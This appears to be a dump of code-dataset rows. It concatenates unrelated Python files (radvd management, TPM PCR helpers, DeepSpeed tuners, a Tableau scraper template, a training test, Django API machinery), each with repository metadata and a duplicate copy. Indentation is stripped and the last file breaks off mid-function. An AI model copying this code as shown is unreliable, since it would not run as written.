for p in router_ports:
subnets = p.get('subnets', [])
for subnet in subnets:
prefix = subnet['cidr']
if netaddr.IPNetwork(prefix).version == 6:
interface_name = self._dev_name_helper(p['id'])
ra_mode = subnet['ipv6_ra_mode']
buf.write('%s' % CONFIG_TEMPLATE.render(
ra_mode=ra_mode,
interface_name=interface_name,
prefix=prefix,
constants=constants))
utils.replace_file(radvd_conf, buf.getvalue())
return radvd_conf
def _get_radvd_process_manager(self, callback=None):
return external_process.ProcessManager(
uuid=self._router_id,
default_cmd_callback=callback,
namespace=self._router_ns,
service=RADVD_SERVICE_NAME,
conf=cfg.CONF)
def _spawn_radvd(self, radvd_conf):
def callback(pid_file):
# until the process dies
radvd_cmd = [RADVD_SERVICE_CMD,
'-C', '%s' % radvd_conf,
'-p', '%s' % pid_file,
'-m', 'syslog']
return radvd_cmd
pm = self._get_radvd_process_manager(callback)
pm.enable(reload_cfg=True)
self._process_monitor.register(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME,
monitored_process=pm)
LOG.debug("radvd enabled for router %s", self._router_id)
def enable(self, router_ports):
for p in router_ports:
for subnet in p['subnets']:
if netaddr.IPNetwork(subnet['cidr']).version == 6:
LOG.debug("Enable IPv6 RA for router %s", self._router_id)
radvd_conf = self._generate_radvd_conf(router_ports)
self._spawn_radvd(radvd_conf)
return
# Kill the daemon if it's running
self.disable()
def disable(self):
self._process_monitor.unregister(uuid=self._router_id,
service_name=RADVD_SERVICE_NAME)
pm = self._get_radvd_process_manager()
pm.disable()
utils.remove_conf_files(cfg.CONF.ra_confs, self._router_id)
LOG.debug("radvd disabled for router %s", self._router_id)
@property
def enabled(self):
return self._get_radvd_process_manager().active
| true | true |
f7233eafe684defd5f01523f95aa2d62f3244d85 | 1,933 | py | Python | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | 1 | 2020-09-11T01:20:07.000Z | 2020-09-11T01:20:07.000Z | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | null | null | null | appinit_backend/app/lib/system/info.py | app-init/backend | 02bfc059aaa3ba34cb31c2c0cec92391f08826d9 | [
"MIT"
] | null | null | null | from appinit_backend.lib.imports import *
def call(**kwargs):
modules = {}
manager = Manager()
settings = Settings()
db = manager.db("appinit")
cursor = db.apis.find()
for i in cursor:
if ".call" not in i['module'] and i['type'] == "module":
del i['_id']
modules[i['module']] = i
exclude = ["call"]
output = {
"modules": {}
}
if "exclude" in kwargs:
for i in kwargs['exclude']:
for key, value in modules.items():
if i not in key and value['type'] == "module":
output['modules'][key] = value
elif "check_permissions" in kwargs:
all_modules = {}
permissions = kwargs['check_permissions']
for module, value in modules.items():
if value['type'] == 'module':
if len(value['permissions']) > 0:
for i in permissions:
if i in value['permissions']:
all_modules[module] = value
elif not value['internal']:
remove_child = []
for child, child_value in value['child'].items():
if child_value['internal']:
remove_child.append(child)
for i in remove_child:
del value['child'][i]
all_modules[module] = value
elif not value['internal'] and len(value['permissions']) == 0:
if module == "release_planning.products.add":
print(value)
all_modules[module] = value
output['modules'] = all_modules
else:
output['modules'] = modules
output['variables'] = {}
app_variable_keys = [
"smtp",
"admins",
"app-title",
"issue-tracker",
"issue-tracker-type",
"reply-to",
"route-configs"
]
for key in app_variable_keys:
output['variables'][key] = settings.get_variable(key)
return output | 27.614286 | 74 | 0.527677 | from appinit_backend.lib.imports import *
def call(**kwargs):
modules = {}
manager = Manager()
settings = Settings()
db = manager.db("appinit")
cursor = db.apis.find()
for i in cursor:
if ".call" not in i['module'] and i['type'] == "module":
del i['_id']
modules[i['module']] = i
exclude = ["call"]
output = {
"modules": {}
}
if "exclude" in kwargs:
for i in kwargs['exclude']:
for key, value in modules.items():
if i not in key and value['type'] == "module":
output['modules'][key] = value
elif "check_permissions" in kwargs:
all_modules = {}
permissions = kwargs['check_permissions']
for module, value in modules.items():
if value['type'] == 'module':
if len(value['permissions']) > 0:
for i in permissions:
if i in value['permissions']:
all_modules[module] = value
elif not value['internal']:
remove_child = []
for child, child_value in value['child'].items():
if child_value['internal']:
remove_child.append(child)
for i in remove_child:
del value['child'][i]
all_modules[module] = value
elif not value['internal'] and len(value['permissions']) == 0:
if module == "release_planning.products.add":
print(value)
all_modules[module] = value
output['modules'] = all_modules
else:
output['modules'] = modules
output['variables'] = {}
app_variable_keys = [
"smtp",
"admins",
"app-title",
"issue-tracker",
"issue-tracker-type",
"reply-to",
"route-configs"
]
for key in app_variable_keys:
output['variables'][key] = settings.get_variable(key)
return output | true | true |
f7233f20d09fe3032a416f972815fc2001641d45 | 1,666 | py | Python | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | lib/util.py | Foxboron/tpm_futurepcr | 1deebd6cb01854fbcce43a5702870e98e117d276 | [
"MIT"
] | null | null | null | import hashlib
import signify.fingerprinter
import subprocess
NUM_PCRS = 24
PCR_SIZE = hashlib.sha1().digest_size
def to_hex(buf):
import binascii
return binascii.hexlify(buf).decode()
def hexdump(buf):
for i in range(0, len(buf), 16):
row = buf[i:i+16]
offs = "0x%08x:" % i
hexs = ["%02X" % b for b in row] + [" "] * 16
text = [chr(b) if 0x20 < b < 0x7f else "." for b in row] + [" "] * 16
print(offs, " ".join(hexs[:16]), "|%s|" % "".join(text[:16]))
def hash_file(path, digest="sha1"):
h = getattr(hashlib, digest)()
with open(path, "rb") as fh:
buf = True
buf_size = 4 * 1024 * 1024
while buf:
buf = fh.read(buf_size)
h.update(buf)
return h.digest()
def hash_pecoff(path, digest="sha1"):
with open(path, "rb") as fh:
fpr = signify.fingerprinter.AuthenticodeFingerprinter(fh)
fpr.add_authenticode_hashers(getattr(hashlib, digest))
return fpr.hash()[digest]
return None
def init_empty_pcrs():
pcrs = {x: (b"\xFF" if x in {17, 18, 19, 20, 21, 22} else b"\x00") * PCR_SIZE
for x in range(NUM_PCRS)}
return pcrs
def read_current_pcr(idx):
res = subprocess.run(["tpm2_pcrlist", "-L", "sha1:%d" % idx, "-Q", "-o", "/dev/stdout"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout
def find_mountpoint_by_partuuid(partuuid):
res = subprocess.run(["findmnt", "-S", "PARTUUID=%s" % partuuid, "-o", "TARGET", "-r", "-n"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout.splitlines()[0].decode()
| 31.433962 | 97 | 0.581032 | import hashlib
import signify.fingerprinter
import subprocess
NUM_PCRS = 24
PCR_SIZE = hashlib.sha1().digest_size
def to_hex(buf):
import binascii
return binascii.hexlify(buf).decode()
def hexdump(buf):
for i in range(0, len(buf), 16):
row = buf[i:i+16]
offs = "0x%08x:" % i
hexs = ["%02X" % b for b in row] + [" "] * 16
text = [chr(b) if 0x20 < b < 0x7f else "." for b in row] + [" "] * 16
print(offs, " ".join(hexs[:16]), "|%s|" % "".join(text[:16]))
def hash_file(path, digest="sha1"):
h = getattr(hashlib, digest)()
with open(path, "rb") as fh:
buf = True
buf_size = 4 * 1024 * 1024
while buf:
buf = fh.read(buf_size)
h.update(buf)
return h.digest()
def hash_pecoff(path, digest="sha1"):
with open(path, "rb") as fh:
fpr = signify.fingerprinter.AuthenticodeFingerprinter(fh)
fpr.add_authenticode_hashers(getattr(hashlib, digest))
return fpr.hash()[digest]
return None
def init_empty_pcrs():
pcrs = {x: (b"\xFF" if x in {17, 18, 19, 20, 21, 22} else b"\x00") * PCR_SIZE
for x in range(NUM_PCRS)}
return pcrs
def read_current_pcr(idx):
res = subprocess.run(["tpm2_pcrlist", "-L", "sha1:%d" % idx, "-Q", "-o", "/dev/stdout"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout
def find_mountpoint_by_partuuid(partuuid):
res = subprocess.run(["findmnt", "-S", "PARTUUID=%s" % partuuid, "-o", "TARGET", "-r", "-n"],
stdout=subprocess.PIPE)
res.check_returncode()
return res.stdout.splitlines()[0].decode()
| true | true |
f7233f2e8d752d094729ad3663daedf3710a1f26 | 1,096 | py | Python | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 2 | 2021-03-17T12:00:32.000Z | 2021-03-17T12:18:30.000Z | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 30 | 2020-05-05T01:04:46.000Z | 2022-03-18T18:12:10.000Z | deepspeed/autotuning/tuner/index_based_tuner.py | ganik/DeepSpeed | 788e1c40e83beacfc4901e7daa1e097d2efb82bb | [
"MIT"
] | 3 | 2021-07-19T14:05:01.000Z | 2022-01-31T10:24:35.000Z | import random
from deepspeed.utils import logger
from .base_tuner import BaseTuner
class RandomTuner(BaseTuner):
"""Explore the search space in random order"""
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = random.sample(self.all_exps, sample_size)
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
class GridSearchTuner(BaseTuner):
"""Explore the search space in sequential order"""
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = self.all_exps[0:sample_size]
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
| 30.444444 | 76 | 0.691606 | import random
from deepspeed.utils import logger
from .base_tuner import BaseTuner
class RandomTuner(BaseTuner):
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = random.sample(self.all_exps, sample_size)
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
class GridSearchTuner(BaseTuner):
def __init__(self, exps: list, resource_manager, metric):
super().__init__(exps, resource_manager, metric)
def next_batch(self, sample_size=1):
if sample_size > len(self.all_exps):
sample_size = len(self.all_exps)
sampled_batch = self.all_exps[0:sample_size]
self.all_exps = [x for x in self.all_exps if x not in sampled_batch]
return sampled_batch
| true | true |
f7233f54be53aebd46001e1c935dd5fbe4d82ab8 | 687 | py | Python | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 7 | 2020-11-11T14:47:46.000Z | 2021-12-28T02:21:41.000Z | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 176 | 2020-11-13T00:32:44.000Z | 2022-02-17T01:32:30.000Z | helpers/templates/tableau.py | kxdan/can-scrapers | a0641976ce59e710cec30f065276a4ddd804e9b3 | [
"MIT"
] | 13 | 2020-11-14T19:25:34.000Z | 2021-04-04T22:32:07.000Z | import pandas as pd
import us
from can_tools.scrapers.base import CMU
from can_tools.scrapers.official.base import TableauDashboard
class {{ scraper.name }}(TableauDashboard):
has_location = False
source = "{{ scraper.source }}"
source_name = "{{ scraper.source_name }}"
state_fips = int(us.states.lookup("{{ scraper.state_name }}").fips)
location_type = "county"
baseurl = "{{ scraper.baseurl }}"
viewPath = "{{ scraper.viewPath }}"
data_tableau_table = "{{ scraper.data_tableau_table }}"
location_name_col = "{{ scraper.location_name_col }}"
timezone = "{{ scraper.timezone }}"
# map wide form column names into CMUs
cmus = {
}
| 28.625 | 71 | 0.672489 | import pandas as pd
import us
from can_tools.scrapers.base import CMU
from can_tools.scrapers.official.base import TableauDashboard
class {{ scraper.name }}(TableauDashboard):
has_location = False
source = "{{ scraper.source }}"
source_name = "{{ scraper.source_name }}"
state_fips = int(us.states.lookup("{{ scraper.state_name }}").fips)
location_type = "county"
baseurl = "{{ scraper.baseurl }}"
viewPath = "{{ scraper.viewPath }}"
data_tableau_table = "{{ scraper.data_tableau_table }}"
location_name_col = "{{ scraper.location_name_col }}"
timezone = "{{ scraper.timezone }}"
cmus = {
}
| false | true |
f723405bc13d056885407776297cf576268d77cf | 1,714 | py | Python | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | tests/callbacks/test_speed_monitor.py | jbloxham/composer | 6dd0a0f297cafb404333d6280a5344bcb7f3bee6 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 MosaicML. All Rights Reserved.
import collections.abc
from unittest.mock import MagicMock
import pytest
from composer.callbacks import SpeedMonitorHparams
from composer.trainer import TrainerHparams
@pytest.mark.timeout(60)
@pytest.mark.run_long
def test_speed_monitor(mosaic_trainer_hparams: TrainerHparams):
speed_monitor_hparams = SpeedMonitorHparams(window_size=2)
mosaic_trainer_hparams.callbacks.append(speed_monitor_hparams)
mosaic_trainer_hparams.grad_accum = 1
mosaic_trainer_hparams.ddp.fork_rank_0 = False
mosaic_trainer_hparams.total_batch_size = 10
mosaic_trainer_hparams.max_epochs = 2
trainer = mosaic_trainer_hparams.initialize_object()
log_destination = MagicMock()
log_destination.will_log.return_value = True
trainer.logger.backends = [log_destination]
trainer.fit()
throughput_epoch_calls = 0
wall_clock_train_calls = 0
throughput_step_calls = 0
for call_ in log_destination.log_metric.mock_calls:
metrics = call_[1][3]
if "throughput/step" in metrics:
throughput_step_calls += 1
if "throughput/epoch" in metrics:
throughput_epoch_calls += 1
if 'wall_clock_train' in metrics:
wall_clock_train_calls += 1
assert isinstance(trainer.state.train_dataloader, collections.abc.Sized)
expected_step_calls = (len(trainer.state.train_dataloader) -
speed_monitor_hparams.window_size) * mosaic_trainer_hparams.max_epochs
assert throughput_step_calls == expected_step_calls
assert throughput_epoch_calls == mosaic_trainer_hparams.max_epochs
assert wall_clock_train_calls == mosaic_trainer_hparams.max_epochs
| 38.088889 | 97 | 0.763127 |
import collections.abc
from unittest.mock import MagicMock
import pytest
from composer.callbacks import SpeedMonitorHparams
from composer.trainer import TrainerHparams
@pytest.mark.timeout(60)
@pytest.mark.run_long
def test_speed_monitor(mosaic_trainer_hparams: TrainerHparams):
speed_monitor_hparams = SpeedMonitorHparams(window_size=2)
mosaic_trainer_hparams.callbacks.append(speed_monitor_hparams)
mosaic_trainer_hparams.grad_accum = 1
mosaic_trainer_hparams.ddp.fork_rank_0 = False
mosaic_trainer_hparams.total_batch_size = 10
mosaic_trainer_hparams.max_epochs = 2
trainer = mosaic_trainer_hparams.initialize_object()
log_destination = MagicMock()
log_destination.will_log.return_value = True
trainer.logger.backends = [log_destination]
trainer.fit()
throughput_epoch_calls = 0
wall_clock_train_calls = 0
throughput_step_calls = 0
for call_ in log_destination.log_metric.mock_calls:
metrics = call_[1][3]
if "throughput/step" in metrics:
throughput_step_calls += 1
if "throughput/epoch" in metrics:
throughput_epoch_calls += 1
if 'wall_clock_train' in metrics:
wall_clock_train_calls += 1
assert isinstance(trainer.state.train_dataloader, collections.abc.Sized)
expected_step_calls = (len(trainer.state.train_dataloader) -
speed_monitor_hparams.window_size) * mosaic_trainer_hparams.max_epochs
assert throughput_step_calls == expected_step_calls
assert throughput_epoch_calls == mosaic_trainer_hparams.max_epochs
assert wall_clock_train_calls == mosaic_trainer_hparams.max_epochs
| true | true |
f723407cb697035f3ca80b669f150c10433bf6ae | 23,022 | py | Python | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | django_declarative_apis/machinery/__init__.py | demianbrecht/django-declarative-apis | 5d8d5bbf1cdaedd9f823c1a359bc73fb99d6a9b7 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import abc
import http.client
import itertools
import logging
import sys
import django
from django.conf import settings
from django.db import models
from django.http import HttpResponse
from django_declarative_apis.machinery.filtering import apply_filters_to_object
from django_declarative_apis.models import BaseConsumer
from django_declarative_apis.resources.utils import HttpStatusCode
from . import errors
from .attributes import (
Aggregate,
ConsumerAttribute,
DeferrableEndpointTask,
EndpointAttribute,
EndpointTask,
RawRequestObjectProperty,
RequestAdhocQuerySet,
RequestAttribute,
RequestField,
RequestProperty,
RequestUrlField,
RequireAllAttribute,
RequireAllIfAnyAttribute,
RequireOneAttribute,
ResourceField,
)
# these imports are unusued in this file but may be used in other projects
# that use `machinery` as an interface
from .attributes import TypedEndpointAttributeMixin, RequestFieldGroup # noqa
from .utils import locate_object, rate_limit_exceeded
logger = logging.getLogger(__name__)
# TODO:
# * Make it generically handle database write failures (updating the http_status to be 5XX)
# * Create new error for deadline exceeded and catch it in the same place as writes
# * Make deferred tasks actually run deferred
class EndpointResourceAttribute(EndpointAttribute):
def __init__(self, type, filter=None, returns_list=False, **kwargs):
super(EndpointResourceAttribute, self).__init__(**kwargs)
self.type = type
self.filter = filter
self.func = None
self.returns_list = returns_list
def __call__(self, func):
self.func = func
return self
def get_instance_value(self, owner_instance, owner_class):
if not owner_instance:
return self
try:
value = self.func(owner_instance)
except django.core.exceptions.ObjectDoesNotExist:
raise errors.ClientErrorNotFound(
"{0} instance not found".format(self.type.__name__)
)
if value.__class__ == dict:
return value
if not getattr(value, "_api_filter", False):
value._api_filter = self.filter
return value
class EndpointResponseAttribute(EndpointAttribute):
def __init__(self, type, filter=None, **kwargs):
super(EndpointResponseAttribute, self).__init__(**kwargs)
self.type = type
self.filter = filter
self.func = None
def __call__(self, func):
self.func = func
return self
def get_instance_value(self, owner_instance, owner_class):
if not owner_instance:
return self
value = self.func(owner_instance)
if not getattr(value, "_api_filter", False):
if self.filter:
value._api_filter = self.filter
return value
class EndpointDefinitionMeta(abc.ABCMeta, metaclass=abc.ABCMeta):
def __init__(cls, class_name, bases=None, dict=None):
super(EndpointDefinitionMeta, cls).__init__(class_name, bases, dict)
# This metaclass sets EndpointAttributeDiscriptor's names if they haven't otherwise been set
# This will walk parent classes as well so that attributes can be defined through inheritance
ancestor_attribs = (ancestor.__dict__.items() for ancestor in cls.mro())
for name, attribute in itertools.chain(dict.items(), *ancestor_attribs):
try:
if not attribute.name:
attribute.name = name
except AttributeError as e: # noqa
pass
class EndpointBinder(object):
class BoundEndpointManager(object):
def __init__(self, manager, bound_endpoint):
self.manager = manager
self.bound_endpoint = bound_endpoint
self.binding_exc_info = None
self.validation_exc_info = None
def get_response(self):
error = self.binding_exc_info or self.validation_exc_info
if error:
exc_type, exc_value, exc_traceback = error
if isinstance(exc_value, errors.ClientError):
logger.warning(exc_value.error_message)
else:
logger.error(str(exc_value.args) + "\n" + str(exc_traceback))
raise exc_value.with_traceback(exc_traceback)
resource = self.bound_endpoint.resource
if hasattr(resource, "is_dirty"):
if resource and resource.is_dirty(check_relationship=True):
resource.save()
endpoint_tasks = sorted(
self.manager.endpoint_tasks, key=lambda t: t.priority
)
immediate_tasks = filter(
lambda t: not isinstance(t, DeferrableEndpointTask), endpoint_tasks
)
deferred_tasks = filter(
lambda t: isinstance(t, DeferrableEndpointTask), endpoint_tasks
)
try:
for immediate_task in immediate_tasks:
immediate_task.run(self.bound_endpoint)
except errors.ClientError as ce:
if ce.save_changes and resource and resource.is_dirty():
resource.save()
raise
if hasattr(resource, "is_dirty"):
if resource and resource.is_dirty(check_relationship=True):
resource.save()
for deferred_task in deferred_tasks:
deferred_task.run(self.bound_endpoint)
if getattr(resource, "_api_filter", False):
filter_def = resource._api_filter
else:
filter_def = self.bound_endpoint.response_filter
data = self.bound_endpoint.response
status_code = self.bound_endpoint.http_status
if isinstance(data, HttpResponse):
if 200 <= status_code <= 299:
return status_code, data
else:
raise HttpStatusCode(data)
elif isinstance(data, dict):
result = {}
for key, value in data.items():
if isinstance(value, (list, tuple, models.query.QuerySet)):
result[key] = []
for item in value:
result[key].append(
apply_filters_to_object(item, filter_def)
)
else:
result[key] = value
return status_code, result
else:
return (
status_code,
apply_filters_to_object(
data,
filter_def,
self.bound_endpoint.request.META.get("HTTP_X_EXPAND"),
),
)
def __init__(self, endpoint_definition):
super(EndpointBinder, self).__init__()
self.endpoint_definition = endpoint_definition
self.endpoint_attributes = endpoint_definition.get_endpoint_attributes()
self.request_properties = endpoint_definition.get_request_properties()
self.required_request_properties = (
endpoint_definition.get_required_request_properties()
)
try:
self.consumer_attributes = endpoint_definition.get_consumer_attributes()
except AttributeError:
self.consumer_attributes = []
self.request_fields = endpoint_definition.get_request_fields()
self.required_request_fields = endpoint_definition.get_required_request_fields()
self.endpoint_tasks = endpoint_definition.get_tasks()
self.url_fields = endpoint_definition.get_url_fields()
self.adhoc_queries = endpoint_definition.get_adhoc_queries()
def create_bound_endpoint(self, manager, request, *args, **kwargs):
endpoint = self.endpoint_definition()
for url_field in self.url_fields:
if (url_field.api_name or url_field.name) in kwargs:
url_field.set_value(kwargs.get(url_field.api_name or url_field.name))
for adhoc_query_field in self.adhoc_queries:
adhoc_query_field.set_value(
{
key: val
for (key, val) in request.GET.items()
if key.startswith(adhoc_query_field.name)
}
)
# Bind the request object within the instance (this allows RequestProperties to access the request
# without the endpoint definition having direct access to it)
RequestProperty.bind_request_to_instance(endpoint, request)
bound_endpoint_manager = EndpointBinder.BoundEndpointManager(manager, endpoint)
try:
self._bind_endpoint(endpoint)
except Exception as e: # noqa
bound_endpoint_manager.binding_exc_info = sys.exc_info()
return bound_endpoint_manager
try:
self._validate_endpoint(endpoint)
except Exception as e: # noqa
bound_endpoint_manager.validation_exc_info = sys.exc_info()
return bound_endpoint_manager
def _bind_endpoint(self, endpoint):
# Access all request properties (this validates a request using the definition and caches the values)
extra_error_message = ""
missing_required_properties = []
invalid_value_properties = []
for request_property in self.request_properties:
try:
value = getattr(endpoint, request_property.name)
if value is None and request_property.required:
if isinstance(request_property, ConsumerAttribute):
# A missing required consumer attribute should fail quickly as forbidden
raise errors.ClientErrorForbidden()
else:
# Otherwise collect missing properties and report them all together
missing_required_properties.append(request_property)
except errors.ClientErrorMissingFields as mfe: # TODO: seems unreachable
extra_error_message += mfe.error_message # pragma: nocover
except (ValueError, errors.ClientErrorInvalidFieldValues) as ve: # noqa
# Collect invalid values and report them all together
invalid_value_properties.append(request_property) # pragma: nocover
if missing_required_properties or extra_error_message:
raise errors.ClientErrorMissingFields(
[property.name for property in missing_required_properties],
extra_message=extra_error_message,
)
if invalid_value_properties:
raise errors.ClientErrorInvalidFieldValues(
[request_property.name for request_property in invalid_value_properties]
)
def _validate_endpoint(self, endpoint):
# Run standard validators
try:
if not (
endpoint.is_authorized()
and endpoint.is_permitted()
and endpoint.is_valid()
):
raise errors.ClientErrorForbidden(
additional_info=getattr(endpoint, "_validation_error_message", None)
)
except django.core.exceptions.ObjectDoesNotExist:
raise errors.ClientErrorNotFound()
# check ratelimit
rate_limit_key = endpoint.rate_limit_key()
if (rate_limit_key is not None) and rate_limit_exceeded(
rate_limit_key, endpoint.rate_limit_period()
):
raise errors.ClientErrorRequestThrottled()
class _EndpointRequestLifecycleManager(object):
def __init__(self, endpoint_definition):
super(_EndpointRequestLifecycleManager, self).__init__()
self.endpoint_definition = endpoint_definition
self.binder = EndpointBinder(endpoint_definition)
self.endpoint_tasks = endpoint_definition.get_tasks()
def bind_endpoint_to_request(self, request, *args, **kwargs):
return self.binder.create_bound_endpoint(self, request, *args, **kwargs)
def process_request_and_get_response(self, request, *args, **kwargs):
bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
return bound_endpoint.get_response()
def __str__(self): # pragma: nocover
return self.endpoint_definition.__name__
class BehavioralEndpointDefinitionRouter(object):
def __init__(self, *endpoint_definitions):
super(BehavioralEndpointDefinitionRouter, self).__init__()
self.endpoint_definitions = endpoint_definitions
self.endpoint_managers = [
_EndpointRequestLifecycleManager(endpoint)
for endpoint in endpoint_definitions
]
self.endpoint_manager_names = "({0})".format(
",".join(map(lambda e: e.__name__, endpoint_definitions))
)
def bind_endpoint_to_request(self, request, *args, **kwargs):
bound_endpoint = None
for candidate_endpoint_manager in self.endpoint_managers:
bound_endpoint = candidate_endpoint_manager.bind_endpoint_to_request(
request, *args, **kwargs
)
if bound_endpoint.binding_exc_info is None:
break
return bound_endpoint
def process_request_and_get_response(self, request, *args, **kwargs):
try:
bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
logger.info(
"Processing request with handler %s",
bound_endpoint.bound_endpoint.__class__.__name__,
)
return bound_endpoint.get_response()
except errors.ApiError:
raise
except Exception as e: # pragma: nocover
raise errors.ServerError() from e
def __call__(self, *args, **kwargs):
return self.process_request_and_get_response(*args, **kwargs)
def __str__(self): # pragma: nocover
return self.endpoint_manager_names
@property
def documentation(self):
return [x.documentation() for x in self.endpoint_definitions]
class EndpointDefinitionMixin(metaclass=EndpointDefinitionMeta):
pass
class BaseEndpointDefinition(metaclass=EndpointDefinitionMeta):
@abc.abstractmethod
def is_authorized(self):
""" Authorization check. Should be overridden by endpoint definition implementations.
Returns:
``bool``: Whether or not the user should be able to access the resource. Defaults to ``False``.
"""
return False
def is_permitted(self):
return True
def is_valid(self):
return True
def rate_limit_key(self):
"""
Should return a unique key that is used for rate-limiting requests to this endpoint.
Return None if the request should not be rate-limited
"""
return None
def rate_limit_period(self):
"""
number of seconds to enforce between requests with the same rate_limit_key
"""
return 1
@property
def response_filter(self):
filter_def_name = getattr(
settings, "DECLARATIVE_ENDPOINT_DEFAULT_FILTERS", None
)
if filter_def_name:
filter_def = locate_object(filter_def_name)
else:
filter_def = {}
return filter_def
@property
def http_status(self):
return http.client.OK
@property
@abc.abstractmethod
def resource(self):
""" The instance of a resource. Should either be a ``dict`` or instance of a Django Model or QuerySet.
This property *must* be implemented by all endpoint definitions.
"""
raise NotImplementedError("Endpoints must implement self.resource property")
@property
def response(self):
return self.resource
@classmethod
def get_endpoint_attributes(cls):
endpoint_attributes = filter(
lambda attribute: isinstance(attribute, EndpointAttribute),
[getattr(cls, name) for name in dir(cls)],
)
return sorted(
endpoint_attributes, key=lambda attribute: attribute.attribute_number
)
@classmethod
def get_request_properties(cls):
return list(
filter(
lambda attribute: isinstance(attribute, RequestProperty),
cls.get_endpoint_attributes(),
)
)
@classmethod
def get_required_request_properties(cls):
return list(
filter(lambda property: property.required, cls.get_request_properties())
)
@classmethod
def get_request_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestField),
cls.get_request_properties(),
)
)
@classmethod
def get_resource_fields(cls):
return list(
filter(
lambda property: isinstance(property, ResourceField),
cls.get_request_properties(),
)
)
@classmethod
def get_required_request_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestField),
cls.get_required_request_properties(),
)
)
@classmethod
def get_tasks(cls):
endpoint_tasks = filter(
lambda property: isinstance(property, EndpointTask),
cls.get_endpoint_attributes(),
)
return sorted(endpoint_tasks, key=lambda task: task.priority)
@classmethod
def get_url_fields(cls):
return list(
filter(
lambda property: isinstance(property, RequestUrlField),
cls.get_endpoint_attributes(),
)
)
@classmethod
def documentation(cls):
return {
"class_name": cls.__name__,
"fields": [p.documentation for p in cls.get_request_properties()],
}
@classmethod
def get_adhoc_queries(cls):
return [
prop
for prop in cls.get_endpoint_attributes()
if isinstance(prop, RequestAdhocQuerySet)
]
class EndpointDefinition(BaseEndpointDefinition):
""" A base class to be used when defining endpoints.
Base class to be used implementing endpoints that aren't necessarily tied to a model. Also implements
basic consumer-based authentication.
"""
request = RawRequestObjectProperty()
_consumer_type = ConsumerAttribute(field_name="type", default="RW")
is_read_only = False
""" Used to determine accessibility for the current consumer.
"""
def is_permitted(self):
""" Checks authorization for the current consumer.
Returns:
``bool``: Whether or not the user has permission to the resource.
"""
if (
self._consumer_type is None
or self._consumer_type == BaseConsumer.TYPE_READ_WRITE
):
return True
if self._consumer_type == BaseConsumer.TYPE_READ_ONLY:
if self.is_read_only:
return True
if self.request.method == "GET":
return True
else:
self._validation_error_message = (
"Action not allowed for read-only consumer"
)
return False
return False
@classmethod
def get_consumer_attributes(cls):
return list(
filter(
lambda property: isinstance(property, ConsumerAttribute),
cls.get_request_properties(),
)
)
@classmethod
def get_consumer_type(cls):
consumer_attribute = cls.get_consumer_attributes()
if len(consumer_attribute) == 1:
consumer_attribute = consumer_attribute[0]
return consumer_attribute.name
else:
return "unknown"
@classmethod
def documentation(cls):
docs = super().documentation()
docs["consumer_type"] = cls.get_consumer_type()
return docs
class ResourceCreationMixin(object):
@property
def http_status(self):
return http.client.CREATED
class ResourceEndpointDefinition(EndpointDefinition):
""" A base class to be used when defining endpoints bound to models.
"""
consumer = RequestAttribute()
resource_id = RequestUrlField(
name="id", description="UUID of the resource to retrieve"
)
""" The ID of the resource being fetched or updated.
"""
resource_model = None
""" The model to attach to the resource endpoint definition.
Must extend or implement the Django ORM model interface as required.
"""
def __init__(self, *args, **kwargs):
super(ResourceEndpointDefinition, self).__init__()
self._cached_resource = None
@property
def resource(self):
""" Resource implementation
Queries the object manager of `self.resource_model` for the given id (`self.resource_id`).
"""
if not self._cached_resource:
